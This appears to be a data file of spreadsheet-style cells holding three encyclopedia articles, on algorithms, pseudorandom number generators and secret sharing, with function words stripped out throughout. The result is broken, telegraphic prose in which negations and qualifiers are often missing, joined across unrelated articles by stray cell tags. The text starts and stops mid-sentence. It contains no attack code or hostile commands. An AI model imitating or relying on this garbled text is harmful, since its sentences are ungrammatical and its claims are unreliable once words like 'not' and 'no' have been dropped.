enough, small enough† †"smaller smaller without limit trying write molecules, atoms, electrons") list members enumerably infinite writing names, another, notation. humans something equally useful, case certain enumerably infinite sets: they give explicit instructions determining member set, arbitrary finite such instructions given quite explicitly, form could followed computing machine, human capable carrying elementary operations symbols. "enumerably infinite set" whose elements one-to-one correspondence integers. thus boolos jeffrey saying algorithm implies instructions process "creates" output integers arbitrary "input" integer integers that, theory, arbitrarily large. example, algorithm algebraic equation (i.e., arbitrary "input variables" produce output various authors' attempts define notion indicate word implies much this, something order (for addition example): precise instructions language understood "the computer") fast, efficient, "good" process specifies "moves" "the computer" (machine human, equipped necessary internally contained information capabilities) find, decode, process arbitrary input integers/symbols symbols "effectively" produce, "reasonable" time, output-integer specified place specified format.the concept algorithm also used define notion decidability—a notion central explaining formal systems come starting small axioms rules. logic, time algorithm requires complete cannot measured, apparently related customary physical dimension. from uncertainties, characterize ongoing work, stems unavailability definition algorithm suits concrete sense) abstract usage term. most algorithms intended implemented computer programs. however, algorithms also implemented means, biological neural network (for example, human brain implementing arithmetic insect looking food), electrical circuit, mechanical device. formalization algorithms essential computers process data. many computer programs contain algorithms detail specific instructions computer perform—in specific order—to carry specified task, calculating employees' paychecks printing students' report cards. thus, algorithm considered sequence operations simulated turing-complete system. authors assert thesis include minsky (1967), savage (1987) gurevich (2000): minsky: "but also maintain, turing procedure could "naturally" called effective, can, fact, realized (simple) machine. although seem extreme, arguments favor hard refute". gurevich: turing's informal argument favor thesis justifies stronger thesis: every algorithm simulated turing machine according savage [1987], algorithm computational process defined turing machine".turing machines define computational processes terminate. informal definitions algorithms generally require algorithm always terminates. this requirement renders task deciding whether formal procedure algorithm impossible general case—due major theorem computability theory known halting problem. typically, algorithm associated processing information, data read input source, written output device stored processing. stored data regarded part internal state entity performing algorithm. practice, state stored data structures. computational processes, algorithm must rigorously defined: specified applies possible circumstances could arise. this means conditional steps must systematically dealt with, case-by-case; criteria case must clear (and computable). because algorithm precise list precise steps, order computation always crucial functioning algorithm. instructions usually assumed listed explicitly, described starting "from top" going "down bottom"—an idea described formally flow control. far, discussion formalization algorithm assumed premises imperative programming. this common conception—one attempts describe task discrete, "mechanical" means. unique conception formalized algorithms assignment operation, sets value variable. derives intuition "memory" scratchpad. example assignment found below. alternate conceptions constitutes algorithm, functional programming logic programming. expressing algorithms algorithms expressed many kinds notation, including natural languages, pseudocode, flowcharts, drakon-charts, programming languages control tables (processed interpreters). natural language expressions algorithms tend verbose ambiguous, rarely used complex technical algorithms. pseudocode, flowcharts, drakon-charts control tables structured ways express algorithms avoid many ambiguities common statements based natural language. programming languages primarily intended expressing algorithms form executed computer, also often used define document algorithms. there wide variety representations possible express given turing machine program sequence machine tables (see finite-state machine, state transition table control table more), flowcharts drakon-charts (see state diagram more), form rudimentary machine code assembly code called "sets quadruples" (see turing machine more). representations algorithms classed three accepted levels turing machine description, follows: high-level description "...prose describe algorithm, ignoring implementation details. level, need mention machine manages tape head." implementation description "...prose used define turing machine uses head stores data tape. level, give details states transition function." formal description most detailed, "lowest level", gives turing machine's "state table".for example simple algorithm "add m+n" described three levels, examples. design algorithm design refers method mathematical process problem-solving engineering algorithms. design algorithms part many solution theories operation research, dynamic programming divide-and-conquer. techniques designing implementing algorithm designs also called algorithm design patterns, examples including template method pattern decorator pattern. important aspects algorithm design resource (run-time, memory usage) efficiency; notation used describe e.g. algorithm's run-time growth size input increases. typical steps development algorithms: problem definition development model specification algorithm designing algorithm checking correctness algorithm analysis algorithm implementation algorithm program testing documentation preparation computer algorithms "elegant" (compact) programs, "good" (fast) programs notion "simplicity elegance" appears informally knuth precisely chaitin: knuth: want good algorithms loosely defined aesthetic sense. criterion length time taken perform algorithm .... other criteria adaptability algorithm computers, simplicity elegance, etc."chaitin: program 'elegant,' mean smallest possible program producing output does"chaitin prefaces definition with: "i'll show can't prove program 'elegant'"—such proof would solve halting problem (ibid). algorithm versus function computable algorithm: given function multiple algorithms exist. this true, even without expanding available instruction available programmer. rogers observes important distinguish notion algorithm, i.e. procedure notion function computable algorithm, i.e. mapping yielded procedure. function several different algorithms".unfortunately, tradeoff goodness (speed) elegance (compactness)—an elegant program take steps complete computation less elegant. example uses euclid's algorithm appears below. computers (and computors), models computation: computer human "computor") restricted type machine, "discrete deterministic mechanical device" blindly follows instructions. melzak's lambek's primitive models reduced notion four elements: discrete, distinguishable locations, (ii) discrete, indistinguishable counters (iii) agent, (iv) list instructions effective relative capability agent.minsky describes congenial variation lambek's "abacus" model "very simple bases computability". minsky's machine proceeds sequentially five six, depending counts) instructions unless either conditional if-then goto unconditional goto changes program flow sequence. besides halt, minsky's machine includes three assignment (replacement, substitution) operations: zero (e.g. contents location replaced successor (e.g. l+1), decrement (e.g. rarely must programmer write "code" limited instruction set. minsky shows melzak lambek) machine turing complete four general types instructions: conditional goto, unconditional goto, assignment/replacement/substitution, halt. however, different assignment instructions (e.g. decrement, increment, zero/clear/empty minsky machine) also required turing-completeness; exact specification somewhat designer. unconditional goto convenience; constructed initializing dedicated location zero e.g. instruction thereafter instruction then goto unconditional. simulation algorithm: computer (computor) language: knuth advises reader "the best learn algorithm immediately take paper work example". simulation execution real thing? programmer must translate algorithm language simulator/computer/computor effectively execute. stone gives example this: computing roots quadratic equation computor must know take square root. don't, algorithm, effective, must provide rules extracting square root.this means programmer must know "language" effective relative target computing agent (computer/computor). model used simulation? emde boas observes "even base complexity theory abstract instead concrete machines, arbitrariness choice model remains. point notion simulation enters". when speed measured, instruction matters. example, subprogram euclid's algorithm compute remainder would execute much faster programmer "modulus" instruction available rather subtraction worse: minsky's "decrement"). structured programming, canonical structures: church–turing thesis, algorithm computed model known turing complete, minsky's demonstrations, turing completeness requires four instruction types—conditional goto, unconditional goto, assignment, halt. kemeny kurtz observe that, "undisciplined" unconditional gotos conditional if-then gotos result "spaghetti code", programmer write structured programs using instructions; hand also possible, hard, write badly structured programs structured language". tausworthe augments three böhm-jacopini canonical structures: sequence, if-then-else, while-do, more: do-while case. additional benefit structured program lends proofs correctness using mathematical induction.canonical flowchart symbols: graphical aide called flowchart, offers describe document algorithm (and computer program one). like program flow minsky machine, flowchart always starts page proceeds down. primary symbols four: directed arrow showing program flow, rectangle (sequence, goto), diamond (if-then-else), (or-tie). böhm–jacopini canonical structures made primitive shapes. sub-structures "nest" rectangles, single exit occurs superstructure. symbols, build canonical structures shown diagram. examples algorithm example simplest algorithms find largest number list numbers random order. finding solution requires looking every number list. from follows simple algorithm, stated high-level description english prose, high-level description: numbers highest number. assume first number largest number set. remaining number set: number larger current largest number, consider number largest number set. when numbers left iterate over, consider current largest number largest number set.(quasi-)formal description: written prose much closer high-level language computer program, following formal coding algorithm pseudocode pidgin code: euclid's algorithm mathematics, euclidean algorithm, euclid's algorithm, efficient method computing greatest common divisor (gcd) integers (numbers), largest number divides without remainder. named ancient greek mathematician euclid, first described elements bc). oldest algorithms common use. used reduce fractions simplest form, part many number-theoretic cryptographic calculations. euclid poses problem thus: "given numbers prime another, find greatest common measure". defines number multitude composed units": counting number, positive integer including zero. "measure" place shorter measuring length successively times) along longer length remaining portion less shorter length modern words, remainder q×s, quotient, remainder "modulus", integer-fractional part left division.for euclid's method succeed, starting lengths must satisfy requirements: lengths must zero, (ii) subtraction must "proper"; i.e., test must guarantee smaller numbers subtracted larger equal subtraction yields zero). euclid's original proof adds third requirement: lengths must prime another. euclid stipulated could construct reductio absurdum proof numbers' common measure fact greatest. while nicomachus' algorithm euclid's, numbers prime another, yields number common measure. precise, following really nicomachus' algorithm. computer language euclid's algorithm only instruction types required execute euclid's algorithm—some logical tests (conditional goto), unconditional goto, assignment (replacement), subtraction. location symbolized upper case letter(s), e.g. etc. varying quantity (number) location written lower case letter(s) (usually) associated location's name. example, location start might contain number 3009. inelegant program euclid's algorithm following algorithm framed knuth's four-step version euclid's nicomachus', but, rather using division find remainder, uses successive subtractions shorter length remaining length less high-level description, shown boldface, adapted knuth 1973:2–4: input: [into locations numbers represent lengths]: input [initialize make remaining length equal starting/initial/input length [ensure [ensure smaller numbers larger then contents larger number skip exchange-steps goto step else swap contents (this first step redundant, useful later discussion). [find remainder]: until remaining length less shorter length repeatedly subtract measuring number remaining length then done measuring goto else measure again, [remainder-loop]: goto remainder zero?]: either last measure exact, remainder zero, program halt, (ii) algorithm must continue: last measure left remainder less measuring number then done goto step else continue step [interchange euclid's algorithm. remainder measure previously smaller number serves temporary location. [repeat measuring process]: goto output: [done. contains greatest common divisor]: print done: halt, end, stop. elegant program euclid's algorithm following version euclid's algorithm requires core instructions thirteen required "inelegant"; worse, "inelegant" requires types instructions. flowchart "elegant" found article. (unstructured) basic language, steps numbered, instruction assignment instruction symbolized "elegant" works: place outer "euclid loop", "elegant" shifts back forth "co-loops", loop computes loop computes this works because, last minuend less equal subtrahend (difference minuend subtrahend), minuend become (the measuring length) subtrahend become (the length measured); words "sense" subtraction reverses. following version used programming languages c-family: testing euclid algorithms does algorithm author wants test cases usually give confidence core functionality. tests enough. test cases, source uses 3009 884. knuth suggested 40902, 24140. another interesting case relatively prime numbers 14157 5950. "exceptional cases" must identified tested. will "inelegant" perform properly ditto "elegant": (yes all). what happens number zero, numbers zero? ("inelegant" computes forever cases; "elegant" computes forever what happens negative numbers entered? fractional numbers? input numbers, i.e. domain function computed algorithm/program, include positive integers including zero, failures zero indicate algorithm (and program instantiates partial function rather total function. notable failure exceptions ariane flight rocket failure (june 1996). proof program correctness mathematical induction: knuth demonstrates application mathematical induction "extended" version euclid's algorithm, proposes general method applicable proving validity algorithm". tausworthe proposes measure complexity program length correctness proof. measuring improving euclid algorithms elegance (compactness) versus goodness (speed): with core instructions, "elegant" clear winner, compared "inelegant" thirteen instructions. however, "inelegant" faster arrives halt fewer steps). algorithm analysis indicates case: "elegant" conditional tests every subtraction loop, whereas "inelegant" one. algorithm (usually) requires many loop-throughs, average much time wasted test needed remainder computed. algorithms improved?: once programmer judges program "fit" "effective"—that computes function intended author—then question becomes, improved? compactness "inelegant" improved elimination five steps. chaitin proved compacting algorithm cannot automated generalized algorithm; rather, done heuristically; i.e., exhaustive search (examples found busy beaver), trial error, cleverness, insight, application inductive reasoning, etc. observe steps repeated steps comparison "elegant" provides hint steps, together steps eliminated. this reduces number core instructions thirteen eight, makes "more elegant" "elegant", nine steps. speed "elegant" improved moving "b=0?" test outside subtraction loops. this change calls addition three instructions goto). "elegant" computes example-numbers faster; whether always case given would require detailed analysis. algorithmic analysis frequently important know much particular resource (such time storage) theoretically required given algorithm. methods developed analysis algorithms obtain quantitative answers (estimates); example, algorithm adds elements list numbers would time requirement o(n), using notation. times algorithm needs remember values: elements far, current position input list. therefore, said space requirement o(1), space required store input numbers counted, o(n) counted. different algorithms complete task different instructions less time, space, 'effort' others. example, binary search algorithm (with cost o(log outperforms sequential search (cost o(n) used table lookups sorted lists arrays. formal versus empirical analysis, study algorithms discipline computer science, often practiced abstractly without specific programming language implementation. sense, algorithm analysis resembles mathematical disciplines focuses underlying properties algorithm specifics particular implementation. usually pseudocode used analysis simplest general representation. however, ultimately, algorithms usually implemented particular hardware/software platforms algorithmic efficiency eventually test using real code. solution "one off" problem, efficiency particular algorithm significant consequences (unless extremely large) algorithms designed fast interactive, commercial long life scientific usage critical. scaling small large frequently exposes inefficient algorithms otherwise benign. empirical testing useful uncover unexpected interactions affect performance. benchmarks used compare before/after potential improvements algorithm program optimization. empirical tests cannot replace formal analysis, though, trivial perform fair manner. execution efficiency illustrate potential improvements possible even well-established algorithms, recent significant innovation, relating algorithms (used heavily field image processing), decrease processing time 1,000 times applications like medical imaging. general, speed improvements depend special properties problem, common practical applications. speedups magnitude enable computing devices make extensive image processing (like digital cameras medical equipment) consume less power. classification there various ways classify algorithms, merits. implementation classify algorithms implementation means. recursion recursive algorithm invokes (makes reference repeatedly certain condition (also known termination condition) matches, method common functional programming. iterative algorithms repetitive constructs like loops sometimes additional data structures like stacks solve given problems. some problems naturally suited implementation other. example, towers hanoi well understood using recursive implementation. every recursive version equivalent (but possibly less complex) iterative version, vice versa. logical algorithm viewed controlled logical deduction. this notion expressed algorithm logic control. logic component expresses axioms used computation control component determines deduction applied axioms. this basis logic programming paradigm. pure logic programming languages, control component fixed algorithms specified supplying logic component. appeal approach elegant semantics: change axioms produces well-defined change algorithm. serial, parallel distributed algorithms usually discussed assumption computers execute instruction algorithm time. those computers sometimes called serial computers. algorithm designed environment called serial algorithm, opposed parallel algorithms distributed algorithms. parallel algorithms take advantage computer architectures several processors work problem time, whereas distributed algorithms utilize multiple machines connected computer network. parallel distributed algorithms divide problem symmetrical asymmetrical subproblems collect results back together. resource consumption algorithms processor cycles processor also communication overhead processors. some sorting algorithms parallelized efficiently, communication overhead expensive. iterative algorithms generally parallelizable. some problems parallel algorithms called inherently serial problems. deterministic non-deterministic deterministic algorithms solve problem exact decision every step algorithm whereas non-deterministic algorithms solve problems guessing although typical guesses made accurate heuristics. exact approximate while many algorithms reach exact solution, approximation algorithms seek approximation closer true solution. approximation reached either using deterministic random strategy. such algorithms practical value many hard problems. examples approximate algorithm knapsack problem, given items. goal pack knapsack maximum total value. each item weight value. total weight carried fixed number solution must consider weights items well value. quantum algorithm they realistic model quantum computation. term usually used algorithms seem inherently quantum, essential feature quantum computing quantum superposition quantum entanglement. design paradigm another classifying algorithms design methodology paradigm. there certain number paradigms, different other. furthermore, categories includes many different types algorithms. some common paradigms are: brute-force exhaustive search this naive method trying every possible solution best. divide conquer divide-and-conquer algorithm repeatedly reduces instance problem smaller instances problem (usually recursively) instances small enough solve easily. example divide conquer merge sorting. sorting done segment data dividing data segments sorting entire data obtained conquer phase merging segments. simpler variant divide conquer called decrease-and-conquer algorithm, solves identical subproblem uses solution subproblem solve bigger problem. divide conquer divides problem multiple subproblems conquer stage complex decrease conquer algorithms. example decrease conquer algorithm binary search algorithm. search enumeration many problems (such playing chess) modeled problems graphs. graph exploration algorithm specifies rules moving around graph useful problems. this category also includes search algorithms, branch bound enumeration backtracking. randomized algorithm such algorithms make choices randomly pseudo-randomly). they useful finding approximate solutions problems finding exact solutions impractical (see heuristic method below). problems, known fastest approximations must involve randomness. whether randomized algorithms polynomial time complexity fastest algorithms problems open question known versus problem. there large classes algorithms:monte carlo algorithms return correct answer high-probability. e.g. subclass polynomial time. vegas algorithms always return correct answer, running time probabilistically bound, e.g. zpp.reduction complexity this technique involves solving difficult problem transforming better-known problem (hopefully) asymptotically optimal algorithms. goal find reducing algorithm whose complexity dominated resulting reduced algorithm's. example, selection algorithm finding median unsorted list involves first sorting list (the expensive portion) pulling middle element sorted list (the cheap portion). this technique also known transform conquer. back tracking approach, multiple solutions built incrementally abandoned determined cannot lead valid full solution. optimization problems optimization problems specific classification algorithms; algorithm problems fall general categories described well following: linear programming when searching optimal solutions linear function bound linear equality inequality constraints, constraints problem used directly producing optimal solutions. there algorithms solve problem category, popular simplex algorithm. problems solved linear programming include maximum flow problem directed graphs. problem additionally requires unknowns must integer classified integer programming. linear programming algorithm solve problem proved restrictions integer values superficial, i.e., solutions satisfy restrictions anyway. general case, specialized algorithm algorithm finds approximate solutions used, depending difficulty problem. dynamic programming when problem shows optimal substructures—meaning optimal solution problem constructed optimal solutions subproblems—and overlapping subproblems, meaning subproblems used solve many different problem instances, quicker approach called dynamic programming avoids recomputing solutions already computed. example, floyd–warshall algorithm, shortest path goal vertex weighted graph found using shortest path goal adjacent vertices. dynamic programming memoization together. main difference dynamic programming divide conquer subproblems less independent divide conquer, whereas subproblems overlap dynamic programming. difference dynamic programming straightforward recursion caching memoization recursive calls. when subproblems independent repetition, memoization help; hence dynamic programming solution complex problems. using memoization maintaining table subproblems already solved, dynamic programming reduces exponential nature many problems polynomial complexity. greedy method greedy algorithm similar dynamic programming algorithm works examining substructures, case problem given solution. such algorithms start solution, given constructed way, improve making small modifications. problems find optimal solution others stop local optima, solutions cannot improved algorithm optimum. popular greedy algorithms finding minimal spanning tree finding optimal solution possible method. huffman tree, kruskal, prim, sollin greedy algorithms solve optimization problem. heuristic method optimization problems, heuristic algorithms used find solution close optimal solution cases finding optimal solution impractical. these algorithms work getting closer closer optimal solution progress. principle, infinite amount time, find optimal solution. their merit find solution close optimal solution relatively short time. such algorithms include local search, tabu search, simulated annealing, genetic algorithms. some them, like simulated annealing, non-deterministic algorithms others, like tabu search, deterministic. when bound error non-optimal solution known, algorithm categorized approximation algorithm. field study every field science problems needs efficient algorithms. related problems field often studied together. some example classes search algorithms, sorting algorithms, merge algorithms, numerical algorithms, graph algorithms, string algorithms, computational geometric algorithms, combinatorial algorithms, medical algorithms, machine learning, cryptography, data compression algorithms parsing techniques. fields tend overlap other, algorithm advances field improve other, sometimes completely unrelated, fields. example, dynamic programming invented optimization resource consumption industry used solving broad range problems many fields. complexity algorithms classified amount time need complete compared input size: constant tim</t>
  </si>
  <si>
    <t>Pseudorandom number generator</t>
  </si>
  <si>
    <t>pseudorandom number generator (prng), also known deterministic random generator (drbg), algorithm generating sequence numbers whose properties approximate properties sequences random numbers. prng-generated sequence truly random, completely determined initial value, called prng's seed (which include truly random values). although sequences closer truly random generated using hardware random number generators, pseudorandom number generators important practice speed number generation reproducibility.prngs central applications simulations (e.g. monte carlo method), electronic games (e.g. procedural generation), cryptography. cryptographic applications require output predictable earlier outputs, elaborate algorithms, inherit linearity simpler prngs, needed. good statistical properties central requirement output prng. general, careful mathematical analysis required confidence prng generates numbers sufficiently close random suit intended use. john neumann cautioned misinterpretation prng truly random generator, joked "anyone considers arithmetical methods producing random digits course, state sin." potential issues practice, output many common prngs exhibit artifacts cause fail statistical pattern-detection tests. these include: shorter-than-expected periods seed states (such seed states called "weak" context); lack uniformity distribution large quantities generated numbers; correlation successive values; poor dimensional distribution output sequence; distances certain values occur distributed differently random sequence distribution.defects exhibited flawed prngs range unnoticeable (and unknown) obvious. example randu random number algorithm used decades mainframe computers. seriously flawed, inadequacy went undetected long time. many fields, research work prior 21st century relied random selection monte carlo simulations, ways relied prngs, much less reliable ideal result using poor-quality prngs. even today, caution sometimes required, illustrated following warning international encyclopedia statistical science (2010). list widely used generators discarded much longer [than list good generators]. trust blindly software vendors. check default favorite software ready replace needed. this last recommendation made past years. perhaps amazingly, remains relevant today years ago. illustration, consider widely used programming language java. 2017, java still relies linear congruential generator (lcg) prng, quality—see below. well-known prng avoid major problems still fairly quickly mersenne twister (discussed below), published 1998. other higher-quality prngs, terms computational statistical performance, developed date; identified list pseudorandom number generators. generators based linear recurrences second half 20th century, standard class algorithms used prngs comprised linear congruential generators. quality lcgs known inadequate, better methods unavailable. press (2007) described result thusly: scientific papers whose results doubt [lcgs related] disappear library shelves, would shelf fist."a major advance construction pseudorandom generators introduction techniques based linear recurrences two-element field; generators related linear-feedback shift registers. 1997 invention mersenne twister, particular, avoided many problems earlier generators. mersenne twister period 937−1 iterations (≈4.3×106001), proven equidistributed dimensions (for 32-bit values), time introduction running faster statistically reasonable generators. 2003, george marsaglia introduced family xorshift generators, based linear recurrence. such generators extremely fast and, combined nonlinear operation, pass strong statistical tests.in 2006, well family generators developed. well generators ways improves quality mersenne twister—which too-large state space slow recovery state spaces large number zeros. cryptographic prngs prng suitable cryptographic applications called cryptographically-secure prng (csprng). requirement csprng adversary knowing seed negligible advantage distinguishing generator's output sequence random sequence. words, prng required pass certain statistical tests, csprng must pass statistical tests restricted polynomial time size seed. though proof property beyond current state computational complexity theory, strong evidence provided reducing csprng problem assumed hard, integer factorization. general, years review required algorithm certified csprng. some classes csprngs include following: stream ciphers block ciphers running counter output feedback mode prngs designed specifically cryptographically secure, microsoft's cryptographic application programming interface function cryptgenrandom, yarrow algorithm (incorporated freebsd), fortuna combination prngs attempt combine several prng primitive algorithms goal removing detectable non-randomness special designs based mathematical hardness assumptions: examples include micali–schnorr generator, naor-reingold pseudorandom function blum blum shub algorithm, provide strong security proof (such algorithms rather slow compared traditional constructions, impractical many applications) generic prngs: shown (cryptographically) secure prng constructed generically one-way function, generic construction extremely slow practice, mainly theoretical interest.it shown likely inserted asymmetric backdoor nist-certified pseudorandom number generator dual_ec_drbg.most prng algorithms produce sequences uniformly distributed several tests. open question, central theory practice cryptography, whether distinguish output high-quality prng truly random sequence. setting, distinguisher knows either known prng algorithm used (but state initialized) truly random algorithm used, distinguish two. security cryptographic algorithms protocols using prngs based assumption infeasible distinguish suitable prng truly random sequence. simplest examples dependency stream ciphers, (most often) work exclusive or-ing plaintext message output prng, producing ciphertext. design cryptographically adequate prngs extremely difficult must meet additional criteria. size period important factor cryptographic suitability prng, one. evaluation criteria german federal office information security (german: bundesamt sicherheit informationstechnik, bsi) established four criteria quality deterministic random number generators. they summarized here: there high probability generated sequences random numbers different other. sequence numbers indistinguishable "truly random" numbers according specified statistical tests. tests monobit test (equal numbers ones zeros sequence), poker test special instance chi-squared test), runs test (counts frequency runs various lengths), longruns test (checks whether exists length greater bits sequence)—both nist, autocorrelation test. essence, requirements test well sequence: zeros ones equally often; sequence zeros ones), next zero) probability one-half; selected subsequence contains information next element(s) sequence. impossible attacker (for practical purposes) calculate, otherwise guess, given subsequence, previous future values sequence, inner state generator. impossible, practical purposes, attacker calculate, guess inner state generator, previous numbers sequence previous inner generator states.for cryptographic applications, generators meeting standards acceptable. mathematical definition given: {\displaystyle probability distribution {\displaystyle \left(\mathbb ,{\mathfrak {b}}\right)} (where {\displaystyle {\mathfrak {b}}} standard borel real line) {\displaystyle {\mathfrak {f}}} non-empty collection borel sets {\displaystyle {\mathfrak {f}}\subseteq {\mathfrak {b}}} e.g. {\displaystyle {\mathfrak {f}}=\left\{\left(-\infty ,t\right]:t\in \mathbb \right\}} {\displaystyle {\mathfrak {f}}} specified, either {\displaystyle {\mathfrak {b}}} {\displaystyle \left\{\left(-\infty ,t\right]:t\in \mathbb \right\}} depending context. {\displaystyle a\subseteq \mathbb non-empty (not necessarily borel set). often {\displaystyle {\displaystyle support interior; instance, {\displaystyle uniform distribution interval {\displaystyle \left(0,1\right]} {\displaystyle might {\displaystyle \left(0,1\right]} {\displaystyle specified, assumed contained support {\displaystyle containing interior, depending context.we call function {\displaystyle f:\mathbb _{1}\rightarrow \mathbb (where {\displaystyle \mathbb _{1}=\left\{1,2,3,\dots \right\}} positive integers) pseudo-random number generator {\displaystyle given {\displaystyle {\mathfrak {f}}} taking values {\displaystyle {\displaystyle f\left(\mathbb _{1}\right)\subseteq {\displaystyle \forall e\in {\mathfrak {f}}\quad \forall \varepsilon &gt;0\quad \exists n\in \mathbb _{1}\quad \forall n\geq n,\quad \left|{\frac {\#\left\{i\in \left\{1,2,\dots ,n\right\}:f(i)\in e\right\}}{n}}-p(e)\right|&lt;\varepsilon {\displaystyle \#s} denotes number elements finite {\displaystyle shown {\displaystyle pseudo-random number generator uniform distribution {\displaystyle \left(0,1\right)} {\displaystyle given probability distribution {\displaystyle {\displaystyle f^{*}\circ pseudo-random number generator {\displaystyle {\displaystyle f^{*}:\left(0,1\right)\rightarrow \mathbb percentile {\displaystyle i.e. {\displaystyle f^{*}(x):=\inf \left\{t\in \mathbb :x\leq f(t)\right\}} intuitively, arbitrary distribution simulated simulation standard uniform distribution. early approaches early computer-based prng, suggested john neumann 1946, known middle-square method. algorithm follows: take number, square remove middle digits resulting number "random number", number seed next iteration. example, squaring number "1111" yields "1234321", written "01234321", 8-digit number square 4-digit number. this gives "2343" "random" number. repeating procedure gives "4896" next result, neumann used digit numbers, process same. problem "middle square" method sequences eventually repeat themselves, quickly, "0000". neumann aware this, found approach sufficient purposes worried mathematical "fixes" would simply hide errors rather remove them. neumann judged hardware random number generators unsuitable, for, record output generated, could later tested errors. record output, would exhaust limited computer memories available, computer's ability read write numbers. numbers written cards, would take much longer write read. eniac computer using, "middle square" method generated numbers rate hundred times faster reading numbers punched cards. middle-square method since supplanted elaborate generators. recent innovation combine middle square weyl sequence. this method produces high-quality output long period (see middle-square method). implementation following simple prng example written javascript. utilises sequence multiplications output seemingly random value normalized range example, 15485863 000th prime number 2038074743 000th one.the example returns similar results javascript's math.random() function. non-uniform generators numbers selected non-uniform probability distribution generated using uniform distribution prng function relates distributions. first, needs cumulative distribution function {\displaystyle f(b)} target distribution {\displaystyle f(b)} {\displaystyle f(b)=\int _{-\infty }^{b}f(b')db'} note {\displaystyle 0=f(-\infty )\leq f(b)\leq f(\infty )=1} using random number uniform distribution probability density "pass by", {\displaystyle f(b)=c} {\displaystyle b=f^{-1}(c)} number randomly selected distribution {\displaystyle f(b)} this based inverse transform sampling. example, inverse cumulative gaussian distribution {\displaystyle \operatorname {erf} ^{-1}(x)} ideal uniform prng range input {\displaystyle would produce sequence (positive only) values gaussian distribution; however when using practical number representations, infinite "tails" distribution truncated finite values. repetitive recalculation {\displaystyle \operatorname {erf} ^{-1}(x)} reduced means ziggurat algorithm faster generation.similar considerations apply generating non-uniform distributions rayleigh poisson. also references bibliography barker kelsey recommendation random number generation using deterministic random generators, nist sp800-90a, january 2012 brent r.p., "some long-period random number generators using shifts xors", anziam journal, 2007; 48:c188–c202 gentle j.e. (2003), random number generation monte carlo methods, springer. hörmann leydold derflinger (2004, 2011), automatic nonuniform random variate generation, springer-verlag. knuth d.e. computer programming, volume seminumerical algorithms, third edition. addison-wesley, 1997. isbn 0-201-89684-2. chapter [extensive coverage statistical tests non-randomness.] luby pseudorandomness cryptographic applications, princeton univ press, 1996. isbn 9780691025469 neumann "various techniques used connection random digits," a.s. householder, g.e. forsythe, h.h. germond, eds., monte carlo method, national bureau standards applied mathematics series, (washington, d.c.: u.s. government printing office, 1951): 36–38. peterson, ivars (1997). jungles randomness mathematical safari. york: john wiley sons. isbn 0-471-16449-6. press w.h., teukolsky s.a., vetterling w.t., flannery b.p. (2007), numerical recipes (cambridge university press). viega "practical random number generation software", proc. 19th annual computer security applications conference, dec. 2003. external links testu01: free, state-of-the-art (gpl) random number test suite. dieharder: free (gpl) random number test suite. "generating random numbers" embedded systems) eric uner (2004) "analysis linux random number generator" gutterman, benny pinkas, tzachy reinman (2006) "better pseudorandom generators" parikshit gopalan, raghu meka, omer reingold, luca trevisan, salil vadhan (microsoft research, 2012) rand() considered harmful youtube stephan lavavej (microsoft, 2013) wsphynx simple online random number generator.random number generated javascript pseudorandom number generators (prngs) algorithms</t>
  </si>
  <si>
    <t>Secret sharing</t>
  </si>
  <si>
    <t>secret sharing (also called secret splitting) refers methods distributing secret among group, individual holds intelligible information secret, sufficient number individuals combine 'shares', secret reconstructed. whereas insecure secret sharing allows attacker gain information share, secure secret sharing 'all nothing' (where 'all' means necessary number shares). type secret sharing scheme dealer players. dealer gives share secret players, specific conditions fulfilled players able reconstruct secret shares. dealer accomplishes giving player share group (for threshold) players together reconstruct secret group fewer players can. such system called n)-threshold scheme (sometimes written t)-threshold scheme). secret sharing invented independently shamir george blakley 1979. importance secret sharing schemes ideal storing information highly sensitive highly important. examples include: encryption keys, missile launch codes, numbered bank accounts. each pieces information must kept highly confidential, exposure could disastrous, however, also critical lost. traditional methods encryption ill-suited simultaneously achieving high levels confidentiality reliability. this storing encryption key, must choose keeping single copy location maximum secrecy, keeping multiple copies different locations greater reliability. increasing reliability storing multiple copies lowers confidentiality creating additional attack vectors; opportunities copy fall wrong hands. secret sharing schemes address problem, allow arbitrarily high levels confidentiality reliability achieved. secret sharing also allows distributor secret trust group aggregate'. traditionally, giving secret group safekeeping would require distributor completely trust members group. secret sharing schemes allow distributor securely store secret group even members trusted time. long number traitors never critical number needed reconstruct secret, secret safe. secret sharing schemes important cloud computing environments. thus distributed many servers threshold secret sharing mechanism. reconstructed needed. secret sharing also suggested sensor networks links liable tapped sending data shares makes task eavesdropper harder. security environments made greater continuous changing shares constructed. "secure" versus "insecure" secret sharing secure secret sharing scheme distributes shares anyone fewer shares information secret someone shares. consider example secret sharing scheme secret phrase "password" divided shares "pa––––––", "––ss––––", "––––wo––", "––––––rd". person shares knows password consists eight letters, thus would guess password billion possible combinations. person share, however, would guess letters, million combinations, persons collude. consequently, system "secure" secret sharing scheme, player fewer secret shares able reduce problem obtaining inner secret without first needing obtain necessary shares. contrast, consider secret sharing scheme secret shared, public asymmetric encryption keys corresponding private keys. each player provided {p1(p2(...(pn(x)))), qj}. scheme, player private remove outer layer encryption, player keys remove first second layer, player fewer keys never fully reach secret without first needing decrypt public-key-encrypted blob corresponding private problem currently believed computationally infeasible. additionally user private keys able decrypt outer layers obtain secret, consequently system secure secret distribution system. limitations several secret-sharing schemes said information-theoretically secure proven others give unconditional security improved efficiency maintaining enough security considered secure common cryptographic primitives. example, might allow secrets protected shares 128-bits entropy each, since share would considered enough stymie conceivable present-day adversary, requiring brute force attack average size 2127. common unconditionally secure secret sharing schemes, limitations: each share secret must least large secret itself. this result based information theory, understood intuitively. given shares, information whatsoever determined secret. thus, final share must contain much information secret itself. there sometimes workaround limitation first compressing secret sharing often possible many secrets (keys example) look like high-quality random data thus hard compress. secret sharing schemes random bits. distribute one-bit secret among threshold people, random bits necessary. distribute secret arbitrary length bits, entropy bits necessary. trivial secret sharing secret sharing trivial. secret simply distributed participants. there several secret-sharing schemes shares necessary recover secret: encode secret arbitrary length binary number give player (except one) random number length give last player result pn−1) bitwise exclusive secret bitwise players' numbers (p). additionally, performed using linear operator group. example, here's alternative functionally equivalent (1). let's select 32-bit integers well-defined overflow semantics (i.e. correct answer preserved, modulo 232). first, divided vector 32-bit integers called vsecret. then players given vector random integers, player receiving remaining player given (vsecret vn−1). secret vector recovered summing across player's vectors. and, generally, desired subset {1,2,...,n} difficulty lies creating schemes still secure, require shares. example, imagine board directors company would like protect secret formula. president company able access formula needed, emergency board members would able unlock secret formula together. this accomplished secret sharing scheme shares given president, given board member. when space efficiency concern, trivial schemes used reveal secret desired subsets players simply applying scheme subset. example, reveal secret three players alice, carol, create three {\displaystyle {\binom {3}{2}}} different 